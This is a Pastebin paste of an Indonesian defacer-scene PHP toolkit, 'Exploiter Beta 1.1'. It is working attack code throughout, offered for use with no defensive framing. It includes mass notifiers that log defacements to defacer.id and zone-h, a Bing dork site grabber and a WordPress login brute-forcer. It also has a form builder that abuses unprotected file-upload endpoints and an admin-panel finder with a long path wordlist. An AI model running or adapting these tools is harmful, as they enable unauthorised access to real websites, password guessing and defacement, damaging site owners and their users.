API tools faq
paste
Advertisement
Viole404

Exploiter Beta 1.1

Viole404
Jul 4th, 2018
240
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.30 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <head>
  3. <title>Toolers</title>
  4. <meta name='author' content='Shun403'>
  5. <meta charset="UTF-8">
  6. <style type='text/css'>
  7. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  8. html {
  9. background: black;
  10. background-image:url(http://animeku.tv/wp-content/uploads/2017/01/Background-Animeku-cewe1.png);background-position:top center;background-size:cover;background-attachment:fixed;background-repeat:no-repeat;color:#a2a2a2;min-width:900px;font:12px titillium,arial;font-stretch:condensed;font-size:12px;margin:0;
  11. color: #ffffff;
  12. font-family: 'Share Tech Mono';
  13. font-size: 12px;
  14. width: 100%;
  15. }
  16. li {
  17. display: inline;
  18. margin: 1px;
  19. padding: 1px;
  20. }
  21.  
  22. #menu a {
  23. padding:2px 10px;
  24. margin:0;
  25. background:#222222;
  26. text-decoration:none;
  27. letter-spacing:2px;
  28. padding: 2px 10px;
  29. margin: 0;
  30. background: #222222;
  31. text-decoration: none;
  32. letter-spacing: 2px;
  33. border-radius: 2px;
  34. border-bottom: 2px solid #B5AFAF;
  35. border-top: 2px solid #B5AFAF;
  36. border-right: 2px solid darkblue;
  37. border-left: 2px solid darkblue;
  38. }
  39. #menu a:hover {
  40. background:#180000;
  41. border-bottom:0px solid #333333;
  42. border-top:0px solid #333333;
  43. }
  44. table tr:first-child{
  45. background: red;
  46. text-align: center;
  47. color: white;
  48. }
  49. table, th, td {
  50. border-collapse:collapse;
  51. font-family: Tahoma, Geneva, sans-serif;
  52. background: transparent;
  53. font-family: 'Share Tech Mono';
  54. font-size: 13px;
  55. }
  56. .table_home, .th_home, .td_home {
  57. border: 1px solid blue;
  58. }
  59. th {
  60. padding: 10px;
  61. }
  62. a {
  63. color: #ffffff;
  64. text-decoration: none;
  65. }
  66. a:hover {
  67. color: blue;
  68. text-decoration: underline;
  69. }
  70. b {
  71. color: blue;
  72. }
  73. input[type=text],input[type=submit] {
  74. background: transparent;
  75. color: #ffffff;
  76. border: 1px solid #ffffff;
  77. margin: 5px auto;
  78. padding-left: 5px;
  79. font-family: 'Share Tech Mono';
  80. font-size: 13px;
  81. }
  82. input[type=submit] {
  83. background: transparent;
  84. color: #ffffff;
  85. border: 1px solid #ffffff;
  86. margin: 5px auto;
  87. padding-left: 5px;
  88. font-family: 'Share Tech Mono';
  89. font-size: 13px;
  90. cursor:pointer;
  91. }
  92. textarea {
  93. border: 1px solid #ffffff;
  94. width: 50%;
  95. height: 200px;
  96. padding-left: 5px;
  97. margin: 10px auto;
  98. resize: none;
  99. background: transparent;
  100. color: #ffffff;
  101. font-family: 'Share Tech Mono';
  102. font-size: 13px;
  103. }
  104. select {
  105. width: 152px;
  106. background: #000000;
  107. color: blue;
  108. border: 1px solid #ffffff;
  109. margin: 5px auto;
  110. padding-left: 5px;
  111. font-family: 'Share Tech Mono';
  112. font-size: 13px;
  113. }
  114. option:hover {
  115. background: blue;
  116. color: #000000;
  117. }
  118. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  119. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  120. .infoweb {
  121. border-right: 1px solid #00FFFF;
  122. }
  123. </style>
  124. <script type="text/javascript" src="http://scmplayer.net/script.js"
  125.  
  126. data-config="{'skin':'http://static.tumblr.com/uf7d8p8/5ylmihcdv/skinlindaawn.css','volume':100,'autoplay':true,'shuffle':false,'repeat':1,'placement':'bottom','showplaylist':false,'playlist':[{'title':'Porter Robinson & Madeon - Shelter','url':'https://www.youtube.com/watch?v=emsSkZu2eNU'},{'title':'OneOkRock-Answer Is Near','url':'https://www.youtube.com/watch?v=UlmhKXA77ro'},{'title':'NightCore - Hotaru','url':'https://www.youtube.com/watch?v=hUxvXv8Bp50'},{'title':'NightCore - Hey Soul Sister','url':'https://www.youtube.com/watch?v=jU2w4kZ6Rb0'},{'title':'NightCore - Apologize','url':'https://www.youtube.com/watch?v=Id9I1YHPWI4'},{'title':'NightCore - Fireflies','url':'https://www.youtube.com/watch?v=pIi_lbsR2ck'},{'title':'NightCore - Dare Yori Mo','url':'https://www.youtube.com/watch?v=P-ANXx_M7gc'},{'title':'Yiruma&Skullee-RiverFlowsInYou','url':'https://www.youtube.com/watch?v=GmBq7xN1Gqk'},{'title':'Teminite & Panda Eyes - Highscore','url':'https://www.youtube.com/watch?v=pEuVb3LhBYM'},{'title':'Parasyte ending - It%27s The Right Time','url':'https://www.youtube.com/watch?v=pcWSiNbP4k8'},{'title':'Tokyo Ghoul - Unravel Lyrics (Official Acoustic)','url':'https://www.youtube.com/watch?v=MMDU4hhRjQM'},{'title':'/PARASYTEost/ ~ Next to You ~ DRUMSTEP REMIX ~','url':'https://www.youtube.com/watch?v=xZYxNl6jP0Y'},{'title':'TheFatRat-NeverBeAlone','url':'https://www.youtube.com/watch?v=iyWjKQo9-m8'},{'title':'TheFatRat-Unity','url':'https://www.youtube.com/watch?v=CzCjMbYZWN8'},]}" ></script>
  127.  
  128. <!-- SCM Music Player script end -->
  129. <?php
  130. echo "<div id='menu'>";
  131. echo "<hr color='red'>";
  132. echo "<hr color='blue'>";
  133. echo "<center>";
  134. echo "<ul>";
  135. echo "<li> <a href='?'>Home</a> </li>";
  136. echo "<li> <a href='?defacerid'>Defacer.id Mass Notify</a> </li>";
  137. echo "<li> <a href='?zoneh'>Zone-h Mass Notify</a> </li>";
  138. echo "<li> <a href='?bing'>Bing Grabber</a> </li>";
  139. echo "<li> <a href='?csrf'>Csrf Exploiter</a> </li>";
  140. echo "<li> <a href='?adfin'>Admin Finder</a> </li>";
  141. echo "<li> <a href='?drupal'>Drupal Mass Exploiter</a> </li>";
  142. echo "<li> <a href='?wpbf'>WordPress BruteForce</a> </li><br><br>";
  143. echo "<li> <a href='?revslider'>Revslider Mass Exploiter</a> </li>";
  144. echo "<li> <a href='?comex'>Com_User Online Exploiter</a> </li>";
  145. echo "<li> <a href='?comscan'>Com_User Scanner</a> </li>";
  146. echo "<li> <a href='?reverse'>ReverseIP</a> </li>";
  147. echo "</ul>";
  148. echo "</center>";
  149. echo "<hr color='blue'>";
  150. echo "<hr color='red'>";
  151. echo "</div>";
  152.  
  153. if(isset($_REQUEST['defacerid'])){
  154. echo "<center><form method='post'>
  155. <u>Defacer</u>: <br>
  156. <input type='text' name='hekel' size='50' value='NickMu'><br>
  157. <u>Team</u>: <br>
  158. <input type='text' name='tim' size='50' value='TeamMu'><br>
  159. <u>Domains</u>: <br>
  160. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  161. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  162. </form>";
  163. $site = explode("\r\n", $_POST['sites']);
  164. $go = $_POST['go'];
  165. $hekel = $_POST['hekel'];
  166. $tim = $_POST['tim'];
  167. if($go) {
  168. foreach($site as $sites) {
  169. $zh = $sites;
  170. $form_url = "https://www.defacer.id/notify";
  171. $data_to_post = array();
  172. $data_to_post['attacker'] = "$hekel";
  173. $data_to_post['team'] = "$tim";
  174. $data_to_post['poc'] = 'SQL Injection';
  175. $data_to_post['url'] = "$zh";
  176. $curl = curl_init();
  177. curl_setopt($curl,CURLOPT_URL, $form_url);
  178. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  179. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  180. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  181. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  182. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  183. $result = curl_exec($curl);
  184. echo $result;
  185. curl_close($curl);
  186. echo "<br>";
  187. }
  188. }
  189. }
  190. if(isset($_REQUEST['zoneh'])){
  191. if($_POST['submit']) {
  192. $domain = explode("\r\n", $_POST['url']);
  193. $nick = $_POST['nick'];
  194. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  195. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  196. function zoneh($url,$nick) {
  197. $ch = curl_init("http://www.zone-h.com/notify/single");
  198. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  199. curl_setopt($ch, CURLOPT_POST, true);
  200. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  201. return curl_exec($ch);
  202. curl_close($ch);
  203. }
  204. foreach($domain as $url) {
  205. $zoneh = zoneh($url,$nick);
  206. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  207. echo "$url -> <font color=blue>OK</font><br>";
  208. } else {
  209. echo "$url -> <font color=red>ERROR</font><br>";
  210. }
  211. }
  212. }
  213. else {
  214. echo "<center><form method='post'>
  215. <u>Defacer</u>: <br>
  216. <input type='text' name='nick' size='50' value='NickMu'><br>
  217. <u>Domains</u>: <br>
  218. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  219. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  220. </form>";
  221. }
  222. echo "</center>";
  223.  
  224. }
  225. if(isset($_REQUEST['bing'])){
  226. @ini_set('output_buffering',0);
  227. ?>
  228. <head>
  229. <style type="text/css">
  230. textarea {
  231. width: 500px;
  232. height: 250px;
  233. border: 1px solid #000000;
  234. margin: 5px auto;
  235. padding: 7px;
  236. }
  237. input[type=text] {
  238. padding-left: 7px;
  239. width: 250px;
  240. height: 25px;
  241. border: 1px solid #000000;
  242. background: blue;
  243. margin: 5px auto;
  244. }
  245. input[type=submit] {
  246. height: 25px;
  247. border: 1px solid #000000;
  248. background: red;
  249. margin: 5px auto;
  250. color: #000000;
  251. }
  252. </style>
  253. </head>
  254. <center><form method="post">
  255. <font color=red>Bing Dork: <input type="text" name="dork" placeholder="dork" required>
  256. <input type="submit" name="go" value=">>">
  257. </form>
  258. <?php
  259. // coded by Mr. Magnom
  260. // Re-Coded to Web Based by Mr. Error 404 - IndoXploit
  261. // greetz to Mr. Magnom - Sanjungan Jiwa
  262. function getsource($url, $proxy) {
  263. $curl = curl_init($url);
  264. curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  265. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  266. if($proxy) {
  267. $proxy = explode(':', autoprox());
  268. curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
  269. curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
  270. }
  271. $content = curl_exec($curl);
  272. curl_close($curl);
  273. return $content;
  274. }
  275. $dork = htmlspecialchars($_POST['dork']);
  276. $do = urlencode($dork);
  277. if(isset($_POST['go'])) {
  278. $npage = 1;
  279. $npages = 30000;
  280. $allLinks = array();
  281. $lll = array();
  282. while($npage <= $npages) {
  283. $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
  284. if($x) {
  285. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  286. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  287. $npage = $npage + 10;
  288. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  289. } else break;
  290. }
  291. $URLs = array();
  292. foreach($allLinks as $url){
  293. $exp = explode("/", $url);
  294. $URLs[] = $exp[2];
  295. }
  296. $array = array_filter($URLs);
  297. $array = array_unique($array);
  298. $sss = count(array_unique($array));
  299. echo "ToTaL SiTe : $sss<br>";
  300. foreach($array as $domain) {
  301. echo "http://$domain/<br>";
  302. }
  303. }
  304. }
  305. if(isset($_REQUEST['wpbf'])){
  306. set_time_limit(0);
  307. error_reporting(0);
  308.  
  309. class rintoar{
  310.  
  311. private $host;
  312. private $user;
  313. private $open;
  314. private $lista;
  315.  
  316. public function banner() {
  317. echo(" <html>
  318. <head>
  319. <title>Wp-Brute Force</title>
  320. <style type='text/css'>
  321.  
  322. .ext{
  323. color: blue;
  324. }
  325.  
  326. .area{
  327. width:400px;
  328. height:350px;
  329. resize:none;
  330. }
  331.  
  332. </style>
  333. </head>
  334. <body>
  335. <h1><center>WordPress Brute Force</center></h1>
  336. <form action='' method='POST'>
  337. <center>Host:<input type='text' name='host' placeholder='http://tager.com/' size='40' > </center><br>
  338. <center>User:<input type='text' name='user' value='admin' size='25'> </center><br>
  339. <center>Wordlist</center>
  340. <center><textarea class='area' name='lista'></textarea><br><br><center>
  341. <center><input type='Submit' value='Start'></center>
  342. </form>
  343. </body>
  344. </html>");
  345.  
  346. }
  347.  
  348. public function extract_post() {
  349. $this->host = $_POST["host"];
  350. $this->user = $_POST["user"];
  351. $this->open = $_POST["lista"];
  352. }
  353.  
  354. public function Xregex() {
  355. if(preg_match("@/wp-login.php@", $this->host)) {
  356. return true;
  357. } else {
  358. $this->host = $_POST["host"]."/wp-login.php";
  359. }
  360. }
  361.  
  362. public function brute() {
  363. $lista = array_filter(explode("\n", $this->open));
  364. foreach($lista as $this->lista) {
  365. for($i=0; $i < count($this->lista); $i++) {
  366. $this->Xcurl();
  367. }
  368. }
  369. }
  370.  
  371. private function cool() {
  372. echo "[+] Host:"."<font color='white'>{$this->host}</font>";
  373. echo " <br/>[+] User:"."<font color='white'>{$this->user}</font>";
  374. echo " <br/>[+] Pass:"."<font color='white'>{$this->lista}</font>";
  375. }
  376.  
  377. private function Xcurl() {
  378. $curl = curl_init();
  379. curl_setopt($curl, CURLOPT_URL, $this->host);
  380. curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
  381. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  382. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
  383. curl_setopt($curl, CURLOPT_POST, true);
  384. curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
  385. $exec = curl_exec($curl);
  386. $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  387. $this->cool();
  388. if($http == 302) {
  389. echo "<font color='#00FF00'> <br/>[+] Success [+] Tinggal Login Aja</font><br>";
  390. break;
  391. } else {
  392. echo "<font color='red'><br/>[+] Failed</font><br>";
  393. }
  394. curl_close($curl);
  395. }
  396. }
  397.  
  398. $wp = new rintoar();
  399. $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
  400. $wp->banner();
  401. $wp->extract_post();
  402. $wp->Xregex();
  403. $wp->brute();
  404. }
  405. if(isset($_REQUEST['csrf'])){
  406. echo '<html>
  407. <center><h1 style="font-size:33px;">CSRF Exploiter </h1><br><br>
  408. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  409. <br><br>
  410. <form method="post" style="font-size:25px;">
  411. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  412. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  413. <input type="submit" name="d" value="Lock!">
  414. </form>';
  415. $url = $_POST["url"];
  416. $pf = $_POST["pf"];
  417. $d = $_POST["d"];
  418. if($d) {
  419. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  420. </html>";
  421. }
  422.  
  423. }
  424. if(isset($_REQUEST['adfin'])){
  425. ?>
  426. <form action="?adfin" method="post">
  427.  
  428. <?php
  429. set_time_limit(0);
  430. error_reporting(0);
  431. $list['front'] ="admin
  432. adm
  433. admincp
  434. admcp
  435. cp
  436. modcp
  437. moderatorcp
  438. adminare
  439. admins
  440. cpanel
  441. controlpanel";
  442. $list['end'] = "admin1.php
  443. adm/
  444. _adm_
  445. _admin_
  446. _administrator_
  447. operator
  448. sika
  449. adminweb
  450. develop
  451. ketua
  452. redaktur
  453. author
  454. user
  455. users
  456. dinkesadmin
  457. retel
  458. panel
  459. paneladmin
  460. panellogin
  461. redaksi
  462. cp-admin
  463. Login@web
  464. admin1
  465. admin2
  466. admin3
  467. admin4
  468. admin5
  469. admin6
  470. admin7
  471. admin8
  472. admin9
  473. admin10
  474. master
  475. master/index.php
  476. master/login.php
  477. terasadmin/index.php
  478. terasadmin/login.php
  479. rahasia
  480. rahasia/login.php
  481. rahasia/admin.php
  482. rahasia/index.php
  483. dinkesadmin/login.php
  484. adminpmb
  485. adminpmb/index.php
  486. adminpmb/login.php
  487. system
  488. system/index.php
  489. system/login.php
  490. system/admin.php
  491. webadmin
  492. webadmin/index.php
  493. webadmin/login.php
  494. wpanel
  495. wpanel/index.php
  496. wpanel/login.php
  497. adminpanel
  498. adminpanel/index.php
  499. adminpanel/login.php
  500. adminkec
  501. adminkec/index.php
  502. adminkec/login.php
  503. admindesa
  504. admindesa/index.php
  505. admindesa/login.php
  506. adminkota
  507. adminkota/index.php
  508. adminkota/login.php
  509. admin123
  510. admin123/index.php
  511. admin123/login.php
  512. logout
  513. logout/index.php
  514. logout/login.php
  515. logout/admin.php
  516. adminweb_setting
  517. admin1.html
  518. admin
  519. administrator
  520. admin1.html
  521. admin2.php
  522. admin2.html
  523. yonetim.php
  524. yonetim.html
  525. yonetici.php
  526. yonetici.html
  527. ccms/
  528. ccms/login.php
  529. ccms/index.php
  530. maintenance/
  531. webmaster/
  532. adm/
  533. configuration/
  534. configure/
  535. websvn/
  536. admin/
  537. admin/account.php
  538. admin/account.html
  539. admin/index.php
  540. admin/index.html
  541. admin/login.php
  542. admin/login.html
  543. admin/home.php
  544. admin/controlpanel.html
  545. admin/controlpanel.php
  546. admin.php
  547. admin.html
  548. admin/cp.php
  549. admin/cp.html
  550. cp.php
  551. cp.html
  552. administrator/
  553. administrator/index.html
  554. administrator/index.php
  555. administrator/login.html
  556. administrator/login.php
  557. administrator/account.html
  558. administrator/account.php
  559. administrator.php
  560. administrator.html
  561. login.php
  562. login.html
  563. modelsearch/login.php
  564. moderator.php
  565. moderator.html
  566. moderator/login.php
  567. moderator/login.html
  568. moderator/admin.php
  569. moderator/admin.html
  570. moderator/
  571. account.php
  572. account.html
  573. controlpanel/
  574. controlpanel.php
  575. controlpanel.html
  576. admincontrol.php
  577. admincontrol.html
  578. adminpanel.php
  579. adminpanel.html
  580. admin1.asp
  581. admin2.asp
  582. yonetim.asp
  583. yonetici.asp
  584. admin/account.asp
  585. admin/index.asp
  586. admin/login.asp
  587. admin/home.asp
  588. admin/controlpanel.asp
  589. admin.asp
  590. admin/cp.asp
  591. cp.asp
  592. administrator/index.asp
  593. administrator/login.asp
  594. administrator/account.asp
  595. administrator.asp
  596. login.asp
  597. modelsearch/login.asp
  598. moderator.asp
  599. moderator/login.asp
  600. moderator/admin.asp
  601. account.asp
  602. controlpanel.asp
  603. admincontrol.asp
  604. adminpanel.asp
  605. fileadmin/
  606. fileadmin.php
  607. fileadmin.asp
  608. fileadmin.html
  609. administration/
  610. administration.php
  611. administration.html
  612. sysadmin.php
  613. sysadmin.html
  614. phpmyadmin/
  615. myadmin/
  616. sysadmin.asp
  617. sysadmin/
  618. ur-admin.asp
  619. ur-admin.php
  620. ur-admin.html
  621. ur-admin/
  622. Server.php
  623. Server.html
  624. Server.asp
  625. Server/
  626. wp-admin/
  627. administr8.php
  628. administr8.html
  629. administr8/
  630. administr8.asp
  631. webadmin/
  632. webadmin.php
  633. webadmin.asp
  634. webadmin.html
  635. administratie/
  636. admins/
  637. admins.php
  638. admins.asp
  639. admins.html
  640. administrivia/
  641. Database_Administration/
  642. WebAdmin/
  643. useradmin/
  644. sysadmins/
  645. admin1/
  646. system-administration/
  647. administrators/
  648. pgadmin/
  649. directadmin/
  650. staradmin/
  651. ServerAdministrator/
  652. SysAdmin/
  653. administer/
  654. LiveUser_Admin/
  655. sys-admin/
  656. typo3/
  657. panel/
  658. cpanel/
  659. cPanel/
  660. cpanel_file/
  661. platz_login/
  662. rcLogin/
  663. blogindex/
  664. formslogin/
  665. autologin/
  666. support_login/
  667. meta_login/
  668. manuallogin/
  669. simpleLogin/
  670. loginflat/
  671. utility_login/
  672. showlogin/
  673. memlogin/
  674. members/
  675. login-redirect/
  676. sub-login/
  677. wp-login.php
  678. login1/
  679. dir-login/
  680. login_db/
  681. xlogin/
  682. smblogin/
  683. customer_login/
  684. UserLogin/
  685. login-us/
  686. acct_login/
  687. admin_area/
  688. bigadmin/
  689. project-admins/
  690. phppgadmin/
  691. pureadmin/
  692. sql-admin/
  693. radmind/
  694. openvpnadmin/
  695. wizmysqladmin/
  696. vadmind/
  697. ezsqliteadmin/
  698. hpwebjetadmin/
  699. newsadmin/
  700. adminpro/
  701. Lotus_Domino_Admin/
  702. bbadmin/
  703. vmailadmin/
  704. Indy_admin/
  705. ccp14admin/
  706. irc-macadmin/
  707. banneradmin/
  708. sshadmin/
  709. phpldapadmin/
  710. macadmin/
  711. administratoraccounts/
  712. admin4_account/
  713. admin4_colon/
  714. radmind-1/
  715. Super-Admin/
  716. AdminTools/
  717. cmsadmin/
  718. SysAdmin2/
  719. globes_admin/
  720. cadmins/
  721. phpSQLiteAdmin/
  722. navSiteAdmin/
  723. server_admin_small/
  724. logo_sysadmin/
  725. server/
  726. database_administration/
  727. power_user/
  728. system_administration/
  729. ss_vms_admin_sm/
  730. adminarea/
  731. bb-admin/
  732. adminLogin/
  733. panel-administracion/
  734. instadmin/
  735. memberadmin/
  736. administratorlogin/
  737. admin/admin.php
  738. admin_area/admin.php
  739. admin_area/login.php
  740. siteadmin/login.php
  741. siteadmin/index.php
  742. siteadmin/login.html
  743. admin/admin.html
  744. admin_area/index.php
  745. bb-admin/index.php
  746. bb-admin/login.php
  747. bb-admin/admin.php
  748. admin_area/login.html
  749. admin_area/index.html
  750. admincp/index.asp
  751. admincp/login.asp
  752. admincp/index.html
  753. webadmin/index.html
  754. webadmin/admin.html
  755. webadmin/login.html
  756. admin/admin_login.html
  757. admin_login.html
  758. panel-administracion/login.html
  759. nsw/admin/login.php
  760. webadmin/login.php
  761. admin/admin_login.php
  762. admin_login.php
  763. admin_area/admin.html
  764. pages/admin/admin-login.php
  765. admin/admin-login.php
  766. admin-login.php
  767. bb-admin/index.html
  768. bb-admin/login.html
  769. bb-admin/admin.html
  770. admin/home.html
  771. pages/admin/admin-login.html
  772. admin/admin-login.html
  773. admin-login.html
  774. admin/adminLogin.html
  775. adminLogin.html
  776. home.html
  777. rcjakar/admin/login.php
  778. adminarea/index.html
  779. adminarea/admin.html
  780. webadmin/index.php
  781. webadmin/admin.php
  782. user.html
  783. modelsearch/login.html
  784. adminarea/login.html
  785. panel-administracion/index.html
  786. panel-administracion/admin.html
  787. modelsearch/index.html
  788. modelsearch/admin.html
  789. admincontrol/login.html
  790. adm/index.html
  791. adm.html
  792. user.php
  793. panel-administracion/login.php
  794. wp-login.php
  795. adminLogin.php
  796. admin/adminLogin.php
  797. home.php
  798. adminarea/index.php
  799. adminarea/admin.php
  800. adminarea/login.php
  801. panel-administracion/index.php
  802. panel-administracion/admin.php
  803. modelsearch/index.php
  804. modelsearch/admin.php
  805. admincontrol/login.php
  806. adm/admloginuser.php
  807. admloginuser.php
  808. admin2/login.php
  809. admin2/index.php
  810. adm/index.php
  811. adm.php
  812. affiliate.php
  813. adm_auth.php
  814. memberadmin.php
  815. administratorlogin.php
  816. admin/admin.asp
  817. admin_area/admin.asp
  818. admin_area/login.asp
  819. admin_area/index.asp
  820. bb-admin/index.asp
  821. bb-admin/login.asp
  822. bb-admin/admin.asp
  823. pages/admin/admin-login.asp
  824. admin/admin-login.asp
  825. admin-login.asp
  826. user.asp
  827. webadmin/index.asp
  828. webadmin/admin.asp
  829. webadmin/login.asp
  830. admin/admin_login.asp
  831. admin_login.asp
  832. panel-administracion/login.asp
  833. adminLogin.asp
  834. admin/adminLogin.asp
  835. home.asp
  836. adminarea/index.asp
  837. adminarea/admin.asp
  838. adminarea/login.asp
  839. panel-administracion/index.asp
  840. panel-administracion/admin.asp
  841. modelsearch/index.asp
  842. modelsearch/admin.asp
  843. admincontrol/login.asp
  844. adm/admloginuser.asp
  845. admloginuser.asp
  846. admin2/login.asp
  847. admin2/index.asp
  848. adm/index.asp
  849. adm.asp
  850. affiliate.asp
  851. adm_auth.asp
  852. memberadmin.asp
  853. administratorlogin.asp
  854. siteadmin/login.asp
  855. siteadmin/index.asp
  856. ADMIN/
  857. paneldecontrol/
  858. login/
  859. cms/
  860. admon/
  861. ADMON/
  862. administrador/
  863. ADMIN/login.php
  864. panelc/
  865. ADMIN/login.html";
  866. function template() {
  867. echo '
  868.  
  869. <script type="text/javascript">
  870. <!--
  871. function insertcode($text, $place, $replace)
  872. {
  873. var $this = $text;
  874. var logbox = document.getElementById($place);
  875. if($replace == 0)
  876. document.getElementById($place).innerHTML = logbox.innerHTML+$this;
  877. else
  878. document.getElementById($place).innerHTML = $this;
  879. //document.getElementById("helpbox").innerHTML = $this;
  880. }
  881. -->
  882. </script>
  883. <br>
  884. <br>
  885. <h1 class="technique-two">
  886.  
  887.  
  888.  
  889. </h1>
  890.  
  891. <div class="wrapper">
  892. <div class="red">
  893. <div class="tube">
  894. <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
  895. <form action="" method="post" name="xploit_form">
  896.  
  897. <tr>
  898. <tr>
  899. <b><td>URL</td>
  900. <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
  901. </td>
  902. </tr><tr>
  903. <td>404 string</td>
  904. <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
  905. </td></b>
  906. </tr><br><td>
  907. <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
  908. </span></td></tr>
  909. </form></td></tr>
  910. <br /></table>
  911. </div> <!-- /tube -->
  912. </div> <!-- /red -->
  913. <br />
  914. <div class="green">
  915. <div class="tube" id="rightcol">
  916. Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
  917. <b>Found ones:<br /></b>
  918. </div> <!-- /tube -->
  919. </div></center><!-- /green -->
  920. <br clear="all" /><br />
  921. <div class="blue">
  922. <div class="tube" id="logbox">
  923. <br />
  924. <br />
  925. Admin page Finder :<br /><br />
  926. </div> <!-- /tube -->
  927. </div> <!-- /blue -->
  928. </div> <!-- /wrapper -->
  929. <br clear="all"><br>';
  930. }
  931. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
  932. if($br == 1) $msg .= "<br />";
  933. echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
  934. if($stop == 1) exit;
  935. @flush();@ob_flush();
  936. }
  937. function check($x, $front=0) {
  938. global $_POST,$site,$false;
  939. if($front == 0) $t = $site.$x;
  940. else $t = 'http://'.$x.'.'.$site.'/';
  941. $headers = get_headers($t);
  942. if (!eregi('200', $headers[0])) return 0;
  943. $data = @file_get_contents($t);
  944. if($_POST['xploit_404string'] == "") if($data == $false) return 0;
  945. if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
  946. return 1;
  947. }
  948.  
  949. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  950. template();
  951. if(!isset($_POST['xploit_url'])) die;
  952. if($_POST['xploit_url'] == '') die;
  953. $site = $_POST['xploit_url'];
  954. if ($site[strlen($site)-1] != "/") $site .= "/";
  955. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
  956. $list['end'] = str_replace("\r", "", $list['end']);
  957. $list['front'] = str_replace("\r", "", $list['front']);
  958. $pathes = explode("\n", $list['end']);
  959. $frontpathes = explode("\n", $list['front']);
  960. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
  961. $verificate = 0;
  962. foreach($pathes as $path) {
  963. show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
  964. $verificate++; show($verificate, 0, 0, 'verified', 1);
  965. if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
  966. else{
  967. show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  968. show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
  969. }
  970. }
  971. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
  972. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
  973. foreach($frontpathes as $frontpath) {
  974. show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
  975. $verificate++; show($verificate, 0, 0, 'verified', 1);
  976. if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
  977. else{
  978. show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  979. show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
  980. }
  981.  
  982. }
  983. }
